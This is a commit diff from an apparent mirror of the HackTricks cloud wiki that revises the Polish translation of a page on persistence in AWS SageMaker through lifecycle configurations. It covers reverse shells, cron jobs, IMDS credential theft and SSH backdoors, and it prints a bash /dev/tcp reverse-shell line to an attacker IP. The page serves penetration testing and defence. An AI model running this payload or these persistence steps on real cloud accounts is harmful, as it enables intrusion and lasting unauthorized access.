mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2026-07-29 07:00:29 -07:00
Translated ['src/pentesting-cloud/aws-security/aws-persistence/aws-sagem
This commit is contained in:
@@ -1,8 +1,8 @@
|
||||
# AWS - SageMaker Lifecycle Configuration Persistence
|
||||
# AWS - Utrzymanie konfiguracji cyklu życia SageMaker
|
||||
|
||||
## Przegląd technik utrzymywania
|
||||
## Przegląd technik utrzymania
|
||||
|
||||
Ta sekcja opisuje metody uzyskiwania trwałości w SageMaker poprzez nadużywanie konfiguracji cyklu życia (LCC), w tym reverse shelle, zadania cron, kradzież poświadczeń za pomocą IMDS oraz backdoory SSH. Te skrypty działają z rolą IAM instancji i mogą utrzymywać się po ponownych uruchomieniach. Większość technik wymaga dostępu do sieci wychodzącej, ale korzystanie z usług w kontrolnej płaszczyźnie AWS może nadal umożliwić sukces, jeśli środowisko jest w trybie "tylko VPC".
|
||||
Ta sekcja opisuje metody uzyskiwania utrzymania w SageMaker poprzez nadużywanie konfiguracji cyklu życia (LCC), w tym reverse shelle, zadania cron, kradzież poświadczeń za pomocą IMDS oraz backdoory SSH. Te skrypty działają z rolą IAM instancji i mogą utrzymywać się po ponownych uruchomieniach. Większość technik wymaga dostępu do sieci wychodzącej, ale korzystanie z usług w kontrolnej płaszczyźnie AWS może nadal umożliwić sukces, jeśli środowisko jest w trybie "tylko VPC".
|
||||
#### Uwaga: Instancje notebooków SageMaker to w zasadzie zarządzane instancje EC2 skonfigurowane specjalnie do obciążeń związanych z uczeniem maszynowym.
|
||||
|
||||
## Wymagane uprawnienia
|
||||
@@ -75,7 +75,7 @@ aws sagemaker update-space --domain-id <DOMAIN_ID> --space-name <SPACE_NAME> --s
|
||||
Konfiguracje cyklu życia mogą być stosowane do różnych typów aplikacji SageMaker Studio:
|
||||
* JupyterServer: Uruchamia skrypty podczas uruchamiania serwera Jupyter, idealne do mechanizmów utrzymywania, takich jak reverse shells i cron jobs.
|
||||
* KernelGateway: Wykonywane podczas uruchamiania aplikacji kernel gateway, przydatne do początkowej konfiguracji lub trwałego dostępu.
|
||||
* CodeEditor: Stosuje się do Edytora Kodów (Code-OSS), umożliwiając skrypty, które uruchamiają się na początku sesji edycji kodu.
|
||||
* CodeEditor: Stosuje się do Edytora Kodów (Code-OSS), umożliwiając skrypty, które uruchamiają się na początku sesji edytowania kodu.
|
||||
|
||||
### Przykładowe polecenie dla każdego typu:
|
||||
|
||||
@@ -102,7 +102,7 @@ aws sagemaker create-studio-lifecycle-config \
|
||||
```
|
||||
### Krytyczne informacje:
|
||||
* Dołączanie LCC do poziomu domeny lub przestrzeni wpływa na wszystkich użytkowników lub aplikacje w zakresie.
|
||||
* Wymaga wyższych uprawnień (sagemaker:UpdateDomain, sagemaker:UpdateSpace), co jest zazwyczaj bardziej wykonalne na poziomie przestrzeni niż domeny.
|
||||
* Wymaga wyższych uprawnień (sagemaker:UpdateDomain, sagemaker:UpdateSpace), co zazwyczaj jest bardziej wykonalne na poziomie przestrzeni niż domeny.
|
||||
* Kontrole na poziomie sieci (np. ścisłe filtrowanie egress) mogą zapobiec udanym reverse shellom lub exfiltracji danych.
|
||||
|
||||
## Reverse Shell za pomocą konfiguracji cyklu życia
|
||||
@@ -118,7 +118,7 @@ nohup bash -i >& /dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0>&1 &
|
||||
```
|
||||
## Utrzymywanie się przez Cron Job za pomocą konfiguracji cyklu życia
|
||||
|
||||
Atakujący może wstrzykiwać zadania cron za pomocą skryptów LCC, zapewniając okresowe wykonywanie złośliwych skryptów lub poleceń, co umożliwia dyskretne utrzymywanie się.
|
||||
Napastnik może wstrzykiwać zadania cron za pomocą skryptów LCC, zapewniając okresowe wykonywanie złośliwych skryptów lub poleceń, co umożliwia dyskretne utrzymywanie się.
|
||||
|
||||
### Przykład ładunku:
|
||||
```
|
||||
|
||||
Reference in New Issue
Block a user